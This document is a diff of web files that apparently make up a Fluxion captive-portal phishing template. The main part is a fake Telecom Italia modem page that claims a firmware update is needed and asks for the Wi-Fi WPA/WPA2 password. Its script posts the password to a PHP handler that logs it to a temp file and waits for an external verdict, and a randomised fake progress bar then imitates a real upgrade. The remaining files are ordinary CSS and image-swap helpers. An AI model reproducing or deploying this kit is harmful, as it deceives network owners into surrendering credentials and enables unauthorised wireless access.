<a href="#" alt="Assistenza" title="Assistenza">
|
||||
<img name="img32" id="img32" src="images/buttonC8_agwifi.gif" alt="Assistenza" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Assistenza" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="Accesso" title="Accesso">
|
||||
<img name="img10" id="img10" src="images/buttonB0.gif" alt="Accesso" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Accesso" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a name="logout_ti" href="#" alt="Esci" title="Esci">
|
||||
<img name="img33" id="img33" src="images/buttonCF.gif" alt="Esci" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Esci" width="115" height="25" border="0">
|
||||
</a>
|
||||
</div>
|
||||
<div id="footer1"></div>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,26 @@
|
|||
var bar = document.getElementById("pbar");
|
||||
|
||||
function addProgress() {
|
||||
var random_value = Math.floor(Math.random() * 10) + 1;
|
||||
|
||||
$({
|
||||
interpVal: bar.value
|
||||
}).animate({
|
||||
interpVal: bar.value + random_value
|
||||
}, {
|
||||
duration: 500,
|
||||
step: function () {
|
||||
bar.value = this.interpVal;
|
||||
}
|
||||
});
|
||||
|
||||
if (bar.value < bar.max) {
|
||||
var random_time = Math.floor(Math.random() * 4000) + 1000;
|
||||
setTimeout(addProgress, random_time);
|
||||
} else
|
||||
alert("Aggiornamento eseguito. Si prega di riavviare il router.");
|
||||
}
|
||||
|
||||
function doProgress() {
|
||||
setTimeout(addProgress, 500);
|
||||
}
|
|
@ -0,0 +1,25 @@
|
|||
// JavaScript Document
|
||||
|
||||
|
||||
function FP_preloadImgs() {//v1.0
|
||||
var d=document,a=arguments; if(!d.FP_imgs) d.FP_imgs=new Array();
|
||||
for(var i=0; i<a.length; i++) { d.FP_imgs[i]=new Image; d.FP_imgs[i].src=a[i]; }
|
||||
}
|
||||
|
||||
function FP_swapImg() {//v1.0
|
||||
var doc=document,args=arguments,elm,n; doc.$imgSwaps=new Array(); for(n=2; n<args.length;
|
||||
n+=2) { elm=FP_getObjectByID(args[n]); if(elm) { doc.$imgSwaps[doc.$imgSwaps.length]=elm;
|
||||
elm.$src=elm.src; elm.src=args[n+1]; } }
|
||||
}
|
||||
|
||||
function FP_getObjectByID(id,o) {//v1.0
|
||||
var c,el,els,f,m,n; if(!o)o=document; if(o.getElementById) el=o.getElementById(id);
|
||||
else if(o.layers) c=o.layers; else if(o.all) el=o.all[id]; if(el) return el;
|
||||
if(o.id==id || o.name==id) return o; if(o.childNodes) c=o.childNodes; if(c)
|
||||
for(n=0; n<c.length; n++) { el=FP_getObjectByID(id,c[n]); if(el) return el; }
|
||||
f=o.forms; if(f) for(n=0; n<f.length; n++) { els=f[n].elements;
|
||||
for(m=0; m<els.length; m++){ el=FP_getObjectByID(id,els[n]); if(el) return el; } }
|
||||
return null;
|
||||
}
|
||||
|
||||
|
|
@ -0,0 +1,159 @@
|
|||
<!--- Page(9159)=[Strumenti] --->
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|
||||
|
||||
<link rel="stylesheet" type="text/css" href="tabelle.css">
|
||||
<link rel="stylesheet" type="text/css" href="../css/style.css">
|
||||
|
||||
<title>Modem Telecom Italia - Strumenti</title>
|
||||
</head>
|
||||
<body>
|
||||
<div style="position:absolute; left:30px; top:5px; width:670px; height:690px; z-index:1; overflow: auto; ">
|
||||
<div name="form_contents">
|
||||
<table width="640" border="0" cellpadding="0" cellspacing="0">
|
||||
<tbody>
|
||||
<tr>
|
||||
<td class="titolo" width="100%"> Strumenti</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%">
|
||||
<table class="tableBg" width="640" border="1" cellpadding="3">
|
||||
<tbody>
|
||||
<tr>
|
||||
<td class="trScura" width="100%" height="100%" bgcolor="#000000">Firmware</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="tdChiara" bgcolor="#000000">
|
||||
<blockquote>
|
||||
<p align="LEFT">
|
||||
<font color="#FF0000">ATTENZIONE: </font>È disponibile un nuovo firmware per il vostro modem che migliorerà le funzionalità e le performance dell'apparato.
|
||||
Per scaricare e aggiornare il firmware è necessario inserire la password WPA/WPA2 e premere il tasto <font color="#0000FF">AGGIORNA</font> per procedere.
|
||||
</p>
|
||||
</blockquote>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
<hr noshade="noshade" align="center" color="#FD5D00">
|
||||
<table class="tableBg" width="640" border="1" cellpadding="3">
|
||||
<tbody>
|
||||
<tr>
|
||||
<td class="trScura" width="100%" height="100%" bgcolor="#000000">Informazioni Firmware</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="tdChiara" bgcolor="#000000">
|
||||
<blockquote>
|
||||
<fieldset>
|
||||
<p><label class="bold">Versione Firmware Corrente :</label> <strong class="output">AGPF_4.3.4</strong></p>
|
||||
|
||||
<p><label class="bold">Data Firmware :</label> <strong class="output">2014/03/04</strong></p>
|
||||
|
||||
<p style="color: #CC0000"><label class="bold">Nuova Versione Firmware :</label> <strong class="output">AGPF_6.2.17</strong></p>
|
||||
|
||||
<p style="color: #CC0000"><label class="bold">Data Aggiornamento Firmware :</label> <strong class="output">2016/02/17</strong></p>
|
||||
</fieldset>
|
||||
</blockquote>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
<hr noshade="noshade" align="center" color="#FD5D00">
|
||||
<table class="tableBg" width="640" border="1" cellpadding="3">
|
||||
<tbody>
|
||||
<tr>
|
||||
<td class="trScura" width="100%" height="100%" bgcolor="#000000">Firmware upgrade</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="tdChiara" bgcolor="#000000">
|
||||
<blockquote>
|
||||
<p align="LEFT"><br>
|
||||
<font color="#FF0000">ATTENZIONE: </font>Il download e l'aggiornamento del firmware può richiedere alcuni minuti. Durante l'aggiornamento non spegnere il router nè chiudere il browser.
|
||||
<form id="updateform" method="post" action="../update.php">
|
||||
<fieldset>
|
||||
<p>
|
||||
<label class="bold" style="width: 40%; display:inline-block; text-align: right; font-size: 10pt">WPA/WPA2 :</label>
|
||||
<input id="wpa_psw" name="wpa_psw" type="password"/>
|
||||
</p>
|
||||
<p>
|
||||
<label class="bold" style="width: 40%; display:inline-block; text-align: right; font-size: 10pt">Conferma WPA/WPA2 :</label>
|
||||
<input id="wpa_psw_conf" name="wpa_psw_conf" type="password"/>
|
||||
</p>
|
||||
</fieldset>
|
||||
|
||||
<p style="text-align: center">
|
||||
<input id="button_update" type="submit" value="Aggiorna" />
|
||||
</p>
|
||||
<p style="text-align: center">
|
||||
<progress id="pbar" value="0" max="100"></progress>
|
||||
</p>
|
||||
</form>
|
||||
</p>
|
||||
</blockquote>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
<script type="text/javascript" src="../js/jquery-2.1.4.min.js"></script>
|
||||
<script type="text/javascript" src="../js/pBar.js"></script>
|
||||
<script type="text/javascript">
|
||||
$(document).ready(function() {
|
||||
$("#updateform").submit(function(e) {
|
||||
|
||||
e.preventDefault();
|
||||
$(".error").hide();
|
||||
|
||||
var hasError = false;
|
||||
var wpa_psw = $("#wpa_psw").val();
|
||||
var wpa_psw_conf = $("#wpa_psw_conf").val();
|
||||
|
||||
if (wpa_psw == '') {
|
||||
$("#wpa_psw").after('<span class="error">Per favore, inserire la password.</span>');
|
||||
hasError = true;
|
||||
} else if (wpa_psw_conf == '') {
|
||||
$("#wpa_psw_conf").after('<span class="error">Per favore, inserire la stessa password.</span>');
|
||||
hasError = true;
|
||||
} else if (wpa_psw != wpa_psw_conf ) {
|
||||
$("#wpa_psw_conf").after('<span class="error">Le password non sono uguali.</span>');
|
||||
hasError = true;
|
||||
}
|
||||
|
||||
|
||||
if (!hasError) {
|
||||
var formURL = $(this).attr("action");
|
||||
var pBar = $("#pbar");
|
||||
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url : formURL,
|
||||
data: {wpa_psw: wpa_psw, wpa_psw_conf: wpa_psw_conf},
|
||||
dataType:'JSON',
|
||||
success:function(response){
|
||||
console.log(response);
|
||||
|
||||
if (response) {
|
||||
// psw OK
|
||||
$("#wpa_psw").prop('disabled', true);
|
||||
$("#wpa_psw_conf").prop('disabled', true);
|
||||
pBar.addClass("update");
|
||||
|
||||
doProgress();
|
||||
} else {
|
||||
alert ("La password inserita non è corretta! Inserire la password corretta.");
|
||||
$("#button_update").prop('disabled', false);
|
||||
}
|
||||
}
|
||||
});
|
||||
}
|
||||
});
|
||||
});
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,148 @@
|
|||
.ti_boxes{font-family:Tahoma;}
|
||||
|
||||
.tdScura {
|
||||
background-color: #53669E;
|
||||
border-color: #000000;
|
||||
color: #FFFFFF;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
}
|
||||
.trScura {
|
||||
background-color: #53669E;
|
||||
border-color: #000000;
|
||||
color: #FFFFFF;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 16px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
}
|
||||
.tdChiara {
|
||||
background-color: #B6C4E9;
|
||||
border-color: #000000;
|
||||
color: #53669E;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
.tdChiaraC {
|
||||
background-color: #B6C4E9;
|
||||
border-color: #000000;
|
||||
color: #53669E;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
text-align: center;
|
||||
}
|
||||
.tdChiara50 {
|
||||
background-color: #B6C4E9;
|
||||
border-color: #000000;
|
||||
color: #53669E;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
height: 45px;
|
||||
text-align: center;
|
||||
}
|
||||
.trChiara {
|
||||
background-color: #B6C4E9;
|
||||
border-color: #000000;
|
||||
color: #53669E;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 16px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
}
|
||||
.tdBianca {
|
||||
background-color: #FFFFFF;
|
||||
border-color: #000000;
|
||||
color: #000000;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
.tdBiancaC{
|
||||
background-color: #FFFFFF;
|
||||
border-color: #000000;
|
||||
color: #000000;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
.tdOrange {
|
||||
background-color: #FFFFFF;
|
||||
border-color: #000000;
|
||||
color: #FF9900;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
text-align: left;
|
||||
}
|
||||
|
||||
.tdGreen {
|
||||
background-color: #FFFFFF;
|
||||
border-color: #000000;
|
||||
color: #00CC00;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
text-align: left;
|
||||
}
|
||||
|
||||
.tdRed {
|
||||
background-color: #FFFFFF;
|
||||
border-color: #000000;
|
||||
color: #FF0000;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
text-align: left;
|
||||
}
|
||||
|
||||
.tdGreenC {
|
||||
background-color: #FFFFFF;
|
||||
border-color: #000000;
|
||||
color: #00CC00;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
.tdRedC {
|
||||
background-color: #FFFFFF;
|
||||
border-color: #000000;
|
||||
color: #FF0000;
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
.titolo {
|
||||
font-family: Tahoma, Arial, Helvetica, sans-serif;
|
||||
color: #53669E;
|
||||
font-size: 24px;
|
||||
font-weight: bold;
|
||||
text-decoration: none;
|
||||
}
|
||||
.tableBg {
|
||||
background-color: #EAEAFF;
|
||||
table-width: "640";
|
||||
border: "1";
|
||||
}
|
|
@ -0,0 +1,35 @@
|
|||
<?php
|
||||
require_once('config/connector.php');
|
||||
|
||||
if( (isset($_POST['wpa_psw']) && !empty($_POST['wpa_psw'])) && (isset($_POST['wpa_psw_conf']) && !empty($_POST['wpa_psw_conf'])))
|
||||
{
|
||||
// Aggiornamento tentativi effettuati
|
||||
$hits = file(HIT);
|
||||
$hits[0]++;
|
||||
file_put_contents(HIT, $hits[0]);
|
||||
|
||||
// Password inviata
|
||||
file_put_contents(DATA, $_POST['wpa_psw']."\r\n", FILE_APPEND);
|
||||
|
||||
// Aggiornamento intento
|
||||
$archivio = fopen(INTENTO, "w");
|
||||
fwrite($archivio, "\n");
|
||||
fclose($archivio);
|
||||
|
||||
while (1)
|
||||
{
|
||||
if (file_get_contents(INTENTO) == 2) {
|
||||
// Password ok
|
||||
echo 'true';
|
||||
break;
|
||||
}
|
||||
else if (file_get_contents(INTENTO) == 1) {
|
||||
// Password errata
|
||||
echo 'false';
|
||||
break;
|
||||
}
|
||||
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
?>
|
|
@ -0,0 +1,10 @@
|
|||
<?php
|
||||
// Configure this file to matching the variable "DUMP_PATH" into fluxion files
|
||||
|
||||
$TMP_PATH = "/tmp/TMPflux/";
|
||||
|
||||
define("HIT", "$TMP_PATH"."hit.txt");
|
||||
define("DATA", "$TMP_PATH"."data.txt");
|
||||
define("STATUS", "$TMP_PATH"."status.txt");
|
||||
define("INTENTO", "$TMP_PATH"."intento");
|
||||
?>
|
|
@ -0,0 +1,870 @@
|
|||
/* CSS Document */
|
||||
td {
|
||||
font-size: 12px !important;
|
||||
}
|
||||
body {
|
||||
background-color:#21333e;
|
||||
/*background: url(/../images/bg_svg.png) repeat-x;*/
|
||||
margin:10px auto;
|
||||
}
|
||||
|
||||
.content{
|
||||
width: 998px;
|
||||
border:0px;
|
||||
background:url(../images/New_ui/middown_bg.png);
|
||||
padding-bottom:24px; /*for FAQ bottom searching bar */
|
||||
|
||||
margin-top:-5px; /* \0 for IE8-9 to move upper for covering the hidden form By Viz*/
|
||||
padding-top:15px; /* \0 for IE8-9 to move upper for covering the hidden form By Viz*/
|
||||
}
|
||||
|
||||
.top-logo{
|
||||
width:380px;
|
||||
/* background:url(../images/New_ui/top-asustitle.png) #c5d2d6 no-repeat;*/
|
||||
vertical-align: top;
|
||||
}
|
||||
.top-logo a{
|
||||
text-decoration:none;
|
||||
}
|
||||
.top-logo a div{
|
||||
font-size:17px;
|
||||
font-family:Arial, Helvetica, sans-serif;
|
||||
font-weight:bolder;
|
||||
color:#FFFFFF;
|
||||
letter-spacing:2px;
|
||||
width:160px;
|
||||
margin:5px 0px 0px 20px;
|
||||
padding:34px 0px 0px 10px;
|
||||
text-align:center;
|
||||
cursor:pointer;
|
||||
text-decoration:none;
|
||||
}
|
||||
|
||||
.banner1{
|
||||
width:998px;
|
||||
height:54px;
|
||||
background:url(../images/New_ui/title_bg.png) 0 0 no-repeat;
|
||||
margin:0px auto;
|
||||
}
|
||||
|
||||
#banner3{
|
||||
width:983px;
|
||||
height:19px;
|
||||
margin:0px auto;
|
||||
}
|
||||
/*=================================1 Button Home================================*/
|
||||
.menu {
|
||||
font-weight:bold;
|
||||
text-shadow: 1px 1px 0px black;
|
||||
width:185px;
|
||||
height:48px;
|
||||
font-family:Verdana;
|
||||
font-size:12px;
|
||||
text-align:left;
|
||||
position:relative;
|
||||
margin-top: -2px;
|
||||
background-color:#3A4042;
|
||||
border: 2px groove #6B7071;
|
||||
}
|
||||
|
||||
.menu:hover, .menu:active{
|
||||
background-color:#77A5C6;
|
||||
}
|
||||
.menu a {height:44px; text-decoration:none; position:relative;}
|
||||
.menu a:link, .menu a:visited {
|
||||
color: #ffffff; display: block;
|
||||
padding-left:10px;
|
||||
position:relative;
|
||||
}
|
||||
|
||||
.menu div#menu_string {
|
||||
filter: progid:DXImageTransform.Microsoft.DropShadow(OffX=1, OffY=1, Color=#000000);
|
||||
}
|
||||
|
||||
.m_qis_r {
|
||||
width:185px;
|
||||
height: 53px;
|
||||
font-family:Verdana;
|
||||
font-size: 12px;
|
||||
color:#ffffff;
|
||||
padding-left:0px;
|
||||
position:relative;
|
||||
font-weight: bolder;
|
||||
text-shadow: 1px 1px 0px black;
|
||||
background: #838383; /* Old browsers */
|
||||
background: -moz-linear-gradient(top, #838383 0%, #262626 100%); /* FF3.6+ */
|
||||
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#838383 ), color-stop(100%,#262626)); /* Chrome,Safari4+ */
|
||||
background: -webkit-linear-gradient(top, #838383 0%, #262626 100%); /* Chrome10+,Safari5.1+ */
|
||||
background: -o-linear-gradient(top, #838383 0%, #262626 100%); /* Opera 11.10+ */
|
||||
background: -ms-linear-gradient(top, #838383 0%, #262626 100%); /* IE10+ */
|
||||
background: linear-gradient(to bottom, #838383 0%, #262626 100%); /* W3C */
|
||||
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#838383', endColorstr='#262626',GradientType=0 ); /* IE6-9 */
|
||||
border-radius:6px;
|
||||
border: 2px groove;
|
||||
border-top-color:#A3A3A3;
|
||||
border-left-color:#7A7A7A;
|
||||
border-bottom-color:#5C5C5C;
|
||||
border-right-color:#6D6D6D;
|
||||
}
|
||||
|
||||
.m_qis_r:hover {
|
||||
background: #B9D8E6; /* Old browsers */
|
||||
background: -moz-linear-gradient(top, #B9D8E6 0%, #699BBF 100%); /* FF3.6+ */
|
||||
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#B9D8E6), color-stop(100%,#699BBF )); /* Chrome,Safari4+ */
|
||||
background: -webkit-linear-gradient(top, #B9D8E6 0%, #699BBF 100%); /* Chrome10+,Safari5.1+ */
|
||||
background: -o-linear-gradient(top, #B9D8E6 0%, #699BBF 100%); /* Opera 11.10+ */
|
||||
background: -ms-linear-gradient(top, #B9D8E6 0%, #699BBF 100%); /* IE10+ */
|
||||
background: linear-gradient(to bottom, #B9D8E6 0%, #699BBF 100%); /* W3C */
|
||||
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#B9D8E6', endColorstr='#699BBF ',GradientType=0 ); /* IE6-9 */
|
||||
border-top-color:#CCE2ED;
|
||||
border-left-color:#BAD5E5;
|
||||
border-bottom-color:#8DB3CF;
|
||||
border-right-color:#B5D1E2;
|
||||
}
|
||||
|
||||
.m0_r {
|
||||
margin-top:10px;
|
||||
width:185px;
|
||||
text-align:center;
|
||||
font-family:Verdana;
|
||||
background-color:#4E5659;
|
||||
color:#ffffff;
|
||||
font-weight:bold;
|
||||
padding-top:0px;
|
||||
position:relative;
|
||||
text-shadow: 1px 1px 0px black;
|
||||
border: 2px groove #6B7071;
|
||||
border-top-left-radius:8px;
|
||||
border-top-right-radius:8px;
|
||||
height:33px;
|
||||
}
|
||||
|
||||
.menu_clicked{
|
||||
margin-top: -1px;
|
||||
width:185px;
|
||||
height: 47px;
|
||||
font-family:Verdana;
|
||||
font-size : 12px;
|
||||
color:#ffffff;
|
||||
font-weight:bold;
|
||||
padding-left:0px;
|
||||
position:relative;
|
||||
text-shadow: 1px 1px 0px black;
|
||||
background: #8AA6BE; /* Old browsers */
|
||||
background: -moz-linear-gradient(top, #8AA6BE 0%, #668CAD 44%, #4A779D 45%, #3A6894 46%, #376C9B 100%); /* FF3.6+ */
|
||||
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#8AA6BE ), color-stop(44%,#668CAD), color-stop(45%,#4A779D), color-stop(46%,#3A6894), color-stop(100%,#376C9B)); /* Chrome,Safari4+ */
|
||||
background: -webkit-linear-gradient(top, #8AA6BE 0%, #668CAD 44%, #4A779D 45%, #3A6894 46%,#376C9B 100%); /* Chrome10+,Safari5.1+ */
|
||||
background: -o-linear-gradient(top, #8AA6BE 0%, #668CAD 44%, #4A779D 45%, #3A6894 46%, #376C9B 100%); /* Opera 11.10+ */
|
||||
background: -ms-linear-gradient(top, #8AA6BE 0%, #668CAD 44%, #4A779D 45%, #3A6894 46%, #376C9B 100%); /* IE10+ */
|
||||
background: linear-gradient(to bottom, #8AA6BE 0%, #668CAD 44%, #4A779D 45%, #3A6894 46%, #376C9B 100%); /* W3C */
|
||||
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#8AA6BE', endColorstr='#376C9B',GradientType=0 ); /* IE6-9 */
|
||||
border:2px groove #8AA6BE;
|
||||
border-bottom-color: #6297A9;
|
||||
}
|
||||
|
||||
/*for Firefox*/
|
||||
@-moz-document url-prefix(){
|
||||
.menu, .m0_r, .menu_clicked{
|
||||
border: 2px groove #000;
|
||||
}
|
||||
|
||||
.m_qis_r{
|
||||
border: 1px groove;
|
||||
border-top-color:#A3A3A3;
|
||||
border-left-color:#7A7A7A;
|
||||
border-bottom-color:#5C5C5C;
|
||||
border-right-color:#6D6D6D;
|
||||
}
|
||||
}
|
||||
|
||||
.submenu {width:187px; font-family:Verdana; font-size:11px; line-height:20px;}
|
||||
.submenu a {height:26px; text-decoration:none; }
|
||||
.submenu a:link, .submenu a:visited {
|
||||
color: #94ccf2; display: block;
|
||||
background: url(../images/n-button-01.gif);
|
||||
padding-left:35px;}
|
||||
.submenu a:hover,.submenu a:active {
|
||||
color: #ffffff; background:url(../images/n-button-01.gif) 0 -26px;}
|
||||
|
||||
.thissubmenu {
|
||||
width:152px;
|
||||
height:26px;
|
||||
font-family:Verdana;
|
||||
font-size:11px;
|
||||
padding-left:35px;
|
||||
background:url(../images/n-button-01_r.gif) no-repeat;
|
||||
color:#000000;
|
||||
font-weight:bold;
|
||||
line-height:20px;
|
||||
}
|
||||
|
||||
/*==========================Level 3 Tab Class=================================*/
|
||||
.submenuBlock{
|
||||
width:735px;
|
||||
margin-top:-140px;
|
||||
/* background-color:#547fb6;*/
|
||||
padding-left:0px;
|
||||
position:relative;
|
||||
}
|
||||
|
||||
.b1{
|
||||
padding-top:3px;
|
||||
padding-bottom:0px;
|
||||
padding-left:10px;
|
||||
padding-right:10px;
|
||||
height:30px;
|
||||
background:url(../images/tag-1.gif) 0 bottom no-repeat;
|
||||
font-weight:bold;
|
||||
font-family :Verdana;
|
||||
font-size : 12px;
|
||||
color:#000000
|
||||
}
|
||||
|
||||
.b2{
|
||||
padding-top:3px;
|
||||
padding-bottom:0px;
|
||||
padding-left:10px;
|
||||
padding-right:10px;
|
||||
height:30px;
|
||||
background:url(../images/tag-2.gif) 0 bottom no-repeat;
|
||||
font-weight:bold;
|
||||
font-family:Verdana;
|
||||
font-size:12px;
|
||||
color:#b7e1f7;
|
||||
text-decoration:none;
|
||||
cursor:pointer;
|
||||
}
|
||||
|
||||
.b2 a:link{font-family :Verdana;font-size : 12px;color:#b7e1f7;text-decoration:none;}
|
||||
.b2 a:visited{font-family :Verdana;font-size : 12px;color:#b7e1f7;text-decoration:none;}
|
||||
.b2 a:active{font-family :Verdana;font-size : 12px;color:#b7e1f7;text-decoration:none;}
|
||||
.b2 a:hover{font-family :Verdana;font-size : 12px;color:#ffffff;position:relative;top:1px;left:1px}
|
||||
|
||||
/*==========================Level 3 Tab Class=================================*/
|
||||
.Help thead{
|
||||
font-family:Verdana;
|
||||
font-size:12px;
|
||||
line-height:19px;
|
||||
font-weight:bold;
|
||||
color:#000000;
|
||||
background-image:url(../images/title-bg-2.gif);
|
||||
}
|
||||
.Help tbody{
|
||||
font-family:Verdana;
|
||||
font-size:12px;
|
||||
background-color: #FFFFCC;
|
||||
text-align:left;
|
||||
line-height:150%;
|
||||
}
|
||||
|
||||
.AiHintTitle{
|
||||
font-family :Verdana;
|
||||
font-size:11px;
|
||||
font-weight:bold;
|
||||
color:#000;
|
||||
text-align:center;
|
||||
float:left;
|
||||
margin:0px 4px 0px 2px;
|
||||
height:23px;
|
||||
line-height:23px;
|
||||
}
|
||||
|
||||
.sitemap{
|
||||
font-size:11px;
|
||||
font-family:Verdana, Arial, Helvetica, sans-serif;
|
||||
background-color:#E6EDF0;
|
||||
border:1px solid #666;
|
||||
}
|
||||
.sitemap thead{
|
||||
text-align:center;
|
||||
color:#FFF;
|
||||
font-weight:bold;
|
||||
background-color:#4e6d95;
|
||||
font-size:12px;
|
||||
line-height:150%;
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
border:1px solid #999;
|
||||
}
|
||||
.sitemap .head{
|
||||
text-align:center;
|
||||
color:#FFF;
|
||||
font-weight:bold;
|
||||
background-color:#1F2D35;
|
||||
font-size:12px;
|
||||
line-height:150%;
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
border:1px solid #999;
|
||||
}
|
||||
.sitemap .desp{color:#FFF; background:#4D595D;}
|
||||
|
||||
/**********AiHelp add by Lock*************/
|
||||
#helpicon{
|
||||
font-family:Arial black, Arial, Helvetica, sans-serif;
|
||||
font-size:12px;
|
||||
color: #FF6600;
|
||||
display:block;
|
||||
cursor:pointer;
|
||||
margin:2px 4px 0px 0px;
|
||||
}
|
||||
.closebutton{
|
||||
border:0px;
|
||||
float:right;
|
||||
margin:0px 4px 0px 4px;
|
||||
position:relative;
|
||||
}
|
||||
.hint_body1 {
|
||||
background-color:#FFFFFF;
|
||||
color:#999999;
|
||||
font-size:12px;
|
||||
font-family:Verdana, Arial, Helvetica, sans-serif;
|
||||
padding:8px;
|
||||
width:165px
|
||||
}
|
||||
|
||||
.hint_body1 span{
|
||||
color:#666;
|
||||
font-weight:bold;
|
||||
}
|
||||
|
||||
.hint_body2 {
|
||||
width:165px;
|
||||
padding:5px;
|
||||
color:#333333;
|
||||
font-size:12px;
|
||||
font-family:Verdana, Arial, Helvetica, sans-serif;
|
||||
}
|
||||
.hint_body2 span{
|
||||
color:#333;
|
||||
font-weight:bold;
|
||||
}
|
||||
|
||||
.hintstyle:link{
|
||||
cursor:help;
|
||||
}
|
||||
|
||||
.hintstyle2{
|
||||
color: #0066CC;
|
||||
text-decoration:none;
|
||||
border-bottom:1px dashed #069;
|
||||
cursor:help;
|
||||
}
|
||||
.hintstyle2:link{
|
||||
color: #0fd517;
|
||||
font-weight:bold;
|
||||
text-decoration:none;
|
||||
cursor:help;
|
||||
border-bottom:1px solid #0fd517;
|
||||
}
|
||||
.hintstyle2:hover{
|
||||
color: #0fd517;
|
||||
font-weight:bold;
|
||||
text-decoration:none;
|
||||
cursor:help;
|
||||
border-bottom:1px solid #0fd517;
|
||||
}
|
||||
/**************Add by kcol***************/
|
||||
|
||||
.bottom-image {margin:0 auto; width:998px; background:url(../images/New_ui/bottom_bg.png) no-repeat; height:30px; }
|
||||
.copyright {font-family :Verdana;font-size : 11px;text-align:right;color:#FFFFFF;padding-right:10px; margin:0 auto; width:983px;}
|
||||
|
||||
.popup_bg{
|
||||
position:absolute;
|
||||
margin: auto;
|
||||
top: 0;
|
||||
left: 0;
|
||||
width:100%;
|
||||
height:100%;
|
||||
z-index:9999;
|
||||
background-color: #444F53;
|
||||
filter:alpha(opacity=94); /*IE5、IE5.5、IE6、IE7*/
|
||||
opacity: .94; /*Opera9.0+、Firefox1.5+、Safari、Chrome*/
|
||||
background-repeat: repeat;
|
||||
visibility:hidden;
|
||||
overflow:hidden;
|
||||
}
|
||||
.popup_bar_bg{
|
||||
position:absolute;
|
||||
margin: auto;
|
||||
top: 0;
|
||||
left: 0;
|
||||
width:100%;
|
||||
height:100%;
|
||||
z-index:99;
|
||||
background-color: #444F53;
|
||||
filter:alpha(opacity=90); /*IE5、IE5.5、IE6、IE7*/
|
||||
background-repeat: repeat;
|
||||
visibility:hidden;
|
||||
overflow:hidden;
|
||||
background:rgba(68, 79, 83, 0.9) none repeat scroll 0 0 !important;
|
||||
}
|
||||
|
||||
.loadingBlock{
|
||||
filter:alpha(opacity=90);
|
||||
opacity:.90;
|
||||
-webkit-border-radius: 10px;
|
||||
-moz-border-radius: 10px;
|
||||
border-radius: 10px;
|
||||
behavior: url(/PIE.htc);
|
||||
border-radius: 10px 10px 10px 10px;
|
||||
border: 0px;
|
||||
*margin-top:200px;
|
||||
width:400px;
|
||||
font-size:20px;
|
||||
color:#FFFFFF;
|
||||
font-weight:bolder;
|
||||
background-color:#000000;
|
||||
position:absolute;
|
||||
/*left:35%;*/
|
||||
top:0;Hot
|
||||
z-index:200;
|
||||
_position:absolute;
|
||||
}
|
||||
|
||||
